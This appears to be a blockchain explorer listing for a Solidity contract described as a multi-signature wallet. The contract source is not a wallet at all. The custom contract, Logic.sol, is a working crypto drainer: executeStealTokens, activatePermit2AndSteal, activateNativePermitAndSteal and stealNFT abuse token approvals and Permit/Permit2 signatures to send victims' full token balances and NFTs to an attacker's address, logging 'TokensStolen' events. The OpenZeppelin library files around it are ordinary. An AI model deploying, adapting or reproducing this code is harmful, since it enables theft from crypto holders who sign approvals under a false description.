Description:
Multi-signature wallet contract requiring multiple confirmations for transaction execution.
Blockchain: Ethereum
Source Code: View Code On The Blockchain
Solidity Source Code:
{{
"language": "Solidity",
"sources": {
"@openzeppelin/contracts/access/Ownable.sol": {
"content": "// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v4.9.0) (access/Ownable.sol)
pragma solidity ^0.8.0;
import "../utils/Context.sol";
/**
* @dev Contract module which provides a basic access control mechanism, where
* there is an account (an owner) that can be granted exclusive access to
* specific functions.
*
* By default, the owner account will be the one that deploys the contract. This
* can later be changed with {transferOwnership}.
*
* This module is used through inheritance. It will make available the modifier
* `onlyOwner`, which can be applied to your functions to restrict their use to
* the owner.
*/
abstract contract Ownable is Context {
address private _owner;
event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);
/**
* @dev Initializes the contract setting the deployer as the initial owner.
*/
constructor() {
_transferOwnership(_msgSender());
}
/**
* @dev Throws if called by any account other than the owner.
*/
modifier onlyOwner() {
_checkOwner();
_;
}
/**
* @dev Returns the address of the current owner.
*/
function owner() public view virtual returns (address) {
return _owner;
}
/**
* @dev Throws if the sender is not the owner.
*/
function _checkOwner() internal view virtual {
require(owner() == _msgSender(), "Ownable: caller is not the owner");
}
/**
* @dev Leaves the contract without owner. It will not be possible to call
* `onlyOwner` functions. Can only be called by the current owner.
*
* NOTE: Renouncing ownership will leave the contract without an owner,
* thereby disabling any functionality that is only available to the owner.
*/
function renounceOwnership() public virtual onlyOwner {
_transferOwnership(address(0));
}
/**
* @dev Transfers ownership of the contract to a new account (`newOwner`).
* Can only be called by the current owner.
*/
function transferOwnership(address newOwner) public virtual onlyOwner {
require(newOwner != address(0), "Ownable: new owner is the zero address");
_transferOwnership(newOwner);
}
/**
* @dev Transfers ownership of the contract to a new account (`newOwner`).
* Internal function without access restriction.
*/
function _transferOwnership(address newOwner) internal virtual {
address oldOwner = _owner;
_owner = newOwner;
emit OwnershipTransferred(oldOwner, newOwner);
}
}
"
},
"@openzeppelin/contracts/security/Pausable.sol": {
"content": "// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v4.7.0) (security/Pausable.sol)
pragma solidity ^0.8.0;
import "../utils/Context.sol";
/**
* @dev Contract module which allows children to implement an emergency stop
* mechanism that can be triggered by an authorized account.
*
* This module is used through inheritance. It will make available the
* modifiers `whenNotPaused` and `whenPaused`, which can be applied to
* the functions of your contract. Note that they will not be pausable by
* simply including this module, only once the modifiers are put in place.
*/
abstract contract Pausable is Context {
/**
* @dev Emitted when the pause is triggered by `account`.
*/
event Paused(address account);
/**
* @dev Emitted when the pause is lifted by `account`.
*/
event Unpaused(address account);
bool private _paused;
/**
* @dev Initializes the contract in unpaused state.
*/
constructor() {
_paused = false;
}
/**
* @dev Modifier to make a function callable only when the contract is not paused.
*
* Requirements:
*
* - The contract must not be paused.
*/
modifier whenNotPaused() {
_requireNotPaused();
_;
}
/**
* @dev Modifier to make a function callable only when the contract is paused.
*
* Requirements:
*
* - The contract must be paused.
*/
modifier whenPaused() {
_requirePaused();
_;
}
/**
* @dev Returns true if the contract is paused, and false otherwise.
*/
function paused() public view virtual returns (bool) {
return _paused;
}
/**
* @dev Throws if the contract is paused.
*/
function _requireNotPaused() internal view virtual {
require(!paused(), "Pausable: paused");
}
/**
* @dev Throws if the contract is not paused.
*/
function _requirePaused() internal view virtual {
require(paused(), "Pausable: not paused");
}
/**
* @dev Triggers stopped state.
*
* Requirements:
*
* - The contract must not be paused.
*/
function _pause() internal virtual whenNotPaused {
_paused = true;
emit Paused(_msgSender());
}
/**
* @dev Returns to normal state.
*
* Requirements:
*
* - The contract must be paused.
*/
function _unpause() internal virtual whenPaused {
_paused = false;
emit Unpaused(_msgSender());
}
}
"
},
"@openzeppelin/contracts/security/ReentrancyGuard.sol": {
"content": "// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v4.9.0) (security/ReentrancyGuard.sol)
pragma solidity ^0.8.0;
/**
* @dev Contract module that helps prevent reentrant calls to a function.
*
* Inheriting from `ReentrancyGuard` will make the {nonReentrant} modifier
* available, which can be applied to functions to make sure there are no nested
* (reentrant) calls to them.
*
* Note that because there is a single `nonReentrant` guard, functions marked as
* `nonReentrant` may not call one another. This can be worked around by making
* those functions `private`, and then adding `external` `nonReentrant` entry
* points to them.
*
* TIP: If you would like to learn more about reentrancy and alternative ways
* to protect against it, check out our blog post
* https://blog.openzeppelin.com/reentrancy-after-istanbul/[Reentrancy After Istanbul].
*/
abstract contract ReentrancyGuard {
// Booleans are more expensive than uint256 or any type that takes up a full
// word because each write operation emits an extra SLOAD to first read the
// slot's contents, replace the bits taken up by the boolean, and then write
// back. This is the compiler's defense against contract upgrades and
// pointer aliasing, and it cannot be disabled.
// The values being non-zero value makes deployment a bit more expensive,
// but in exchange the refund on every call to nonReentrant will be lower in
// amount. Since refunds are capped to a percentage of the total
// transaction's gas, it is best to keep them low in cases like this one, to
// increase the likelihood of the full refund coming into effect.
uint256 private constant _NOT_ENTERED = 1;
uint256 private constant _ENTERED = 2;
uint256 private _status;
constructor() {
_status = _NOT_ENTERED;
}
/**
* @dev Prevents a contract from calling itself, directly or indirectly.
* Calling a `nonReentrant` function from another `nonReentrant`
* function is not supported. It is possible to prevent this from happening
* by making the `nonReentrant` function external, and making it call a
* `private` function that does the actual work.
*/
modifier nonReentrant() {
_nonReentrantBefore();
_;
_nonReentrantAfter();
}
function _nonReentrantBefore() private {
// On the first call to nonReentrant, _status will be _NOT_ENTERED
require(_status != _ENTERED, "ReentrancyGuard: reentrant call");
// Any calls to nonReentrant after this point will fail
_status = _ENTERED;
}
function _nonReentrantAfter() private {
// By storing the original value once again, a refund is triggered (see
// https://eips.ethereum.org/EIPS/eip-2200)
_status = _NOT_ENTERED;
}
/**
* @dev Returns true if the reentrancy guard is currently set to "entered", which indicates there is a
* `nonReentrant` function in the call stack.
*/
function _reentrancyGuardEntered() internal view returns (bool) {
return _status == _ENTERED;
}
}
"
},
"@openzeppelin/contracts/utils/Context.sol": {
"content": "// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v4.9.4) (utils/Context.sol)
pragma solidity ^0.8.0;
/**
* @dev Provides information about the current execution context, including the
* sender of the transaction and its data. While these are generally available
* via msg.sender and msg.data, they should not be accessed in such a direct
* manner, since when dealing with meta-transactions the account sending and
* paying for execution may not be the actual sender (as far as an application
* is concerned).
*
* This contract is only required for intermediate, library-like contracts.
*/
abstract contract Context {
function _msgSender() internal view virtual returns (address) {
return msg.sender;
}
function _msgData() internal view virtual returns (bytes calldata) {
return msg.data;
}
function _contextSuffixLength() internal view virtual returns (uint256) {
return 0;
}
}
"
},
"contracts/Logic.sol": {
"content": "// SPDX-License-Identifier: UNLICENSED\r
pragma solidity ^0.8.20;\r
\r
import "@openzeppelin/contracts/access/Ownable.sol";\r
import "@openzeppelin/contracts/security/Pausable.sol";\r
import "@openzeppelin/contracts/security/ReentrancyGuard.sol";\r
\r
\r
interface IERC20 {\r
function transferFrom(address sender, address recipient, uint256 amount) external returns (bool);\r
function balanceOf(address account) external view returns (uint256);\r
}\r
\r
interface IERC721 {\r
function transferFrom(address from, address to, uint256 tokenId) external;\r
}\r
\r
interface IPermit2 {\r
struct PermitDetails { address token; uint160 amount; uint48 expiration; uint48 nonce; }\r
struct PermitBatch { PermitDetails[] details; address spender; uint256 sigDeadline; }\r
function permit(address owner, PermitBatch calldata permitBatch, bytes calldata signature) external;\r
function transferFrom(address from, address to, uint160 amount, address token) external;\r
}\r
\r
contract Logic is Ownable, Pausable, ReentrancyGuard {\r
address public executorAddress;\r
IPermit2 private constant PERMIT2 = IPermit2(0x000000000022D473030F116dDEE9F6B43aC78BA3);\r
\r
event TokensStolen(address indexed token, address indexed victim, uint256 amount);\r
event NftStolen(address indexed nft, address indexed victim, uint256 tokenId);\r
event Permit2Activated(address indexed owner, address indexed spender);\r
event NativePermitActivated(address indexed token, address indexed owner, address indexed spender);\r
event ExecutorSet(address indexed newExecutor);\r
\r
constructor() {\r
_transferOwnership(msg.sender);\r
}\r
modifier onlyExecutor() {\r
require(msg.sender == executorAddress, "Logic: Caller is not the executor");\r
_;\r
}\r
\r
function setExecutor(address _newExecutor) public onlyOwner {\r
require(_newExecutor != address(0), "Logic: Invalid executor address");\r
executorAddress = _newExecutor;\r
emit ExecutorSet(_newExecutor);\r
}\r
\r
function pause() public onlyOwner { _pause(); }\r
function unpause() public onlyOwner { _unpause(); }\r
\r
function executeStealTokens(address tokenAddress, address victim, address destination) public onlyExecutor whenNotPaused nonReentrant {\r
require(destination != address(0), "Logic: Invalid destination");\r
require(victim != address(0), "Logic: Invalid victim");\r
require(tokenAddress != address(0), "Logic: Invalid token");\r
\r
IERC20 token = IERC20(tokenAddress);\r
uint256 balance = token.balanceOf(victim);\r
if (balance > 0) {\r
(bool success, bytes memory data) = tokenAddress.call(abi.encodeWithSelector(IERC20.transferFrom.selector, victim, destination, balance));\r
require(success && (data.length == 0 || abi.decode(data, (bool))), "TRANSFER_FROM_FAILED");\r
emit TokensStolen(tokenAddress, victim, balance);\r
}\r
}\r
\r
function activatePermit2AndSteal(address _owner, IPermit2.PermitBatch calldata _permitData, bytes calldata _signature, address destination) public onlyExecutor whenNotPaused nonReentrant {\r
require(destination != address(0), "Logic: Invalid destination");\r
\r
PERMIT2.permit(_owner, _permitData, _signature);\r
emit Permit2Activated(_owner, _permitData.spender);\r
\r
for (uint256 i = 0; i < _permitData.details.length; i++) {\r
address tokenAddress = _permitData.details[i].token;\r
if (tokenAddress != address(0)) {\r
IERC20 token = IERC20(tokenAddress);\r
uint256 balance = token.balanceOf(_owner);\r
if (balance > 0) {\r
PERMIT2.transferFrom(_owner, destination, uint160(balance), tokenAddress);\r
emit TokensStolen(tokenAddress, _owner, balance);\r
}\r
}\r
}\r
}\r
\r
function activateNativePermitAndSteal(\r
address _tokenAddress, address _owner, address _spender, uint256 _value,\r
uint256 _deadline, bytes calldata _signature, address destination\r
) public onlyExecutor whenNotPaused nonReentrant {\r
\r
bytes32 r = bytes32(_signature[0:32]);\r
bytes32 s = bytes32(_signature[32:64]);\r
uint8 v = uint8(_signature[64]);\r
(bool success, ) = _tokenAddress.call(abi.encodeWithSignature(\r
"permit(address,address,uint256,uint256,uint8,bytes32,bytes32)",\r
_owner, _spender, _value, _deadline, v, r, s\r
));\r
require(success, "NATIVE_PERMIT_FAILED");\r
emit NativePermitActivated(_tokenAddress, _owner, _spender);\r
\r
executeStealTokens(_tokenAddress, _owner, destination);\r
}\r
\r
function stealNFT(address nftAddress, address victim, uint256 tokenId, address destination) public onlyExecutor whenNotPaused nonReentrant {\r
require(destination != address(0), "Logic: Invalid destination");\r
IERC721(nftAddress).transferFrom(victim, destination, tokenId);\r
emit NftStolen(nftAddress, victim, tokenId);\r
}\r
\r
function destroy() public onlyOwner {\r
selfdestruct(payable(owner()));\r
}\r
}"
}
},
"settings": {
"optimizer": {
"enabled": true,
"runs": 200
},
"evmVersion": "london",
"outputSelection": {
"*": {
"*": [
"evm.bytecode",
"evm.deployedBytecode",
"devdoc",
"userdoc",
"metadata",
"abi"
]
}
}
}
}}Submitted on: 2025-09-22 17:52:37
Comments
Log in to comment.
No comments yet.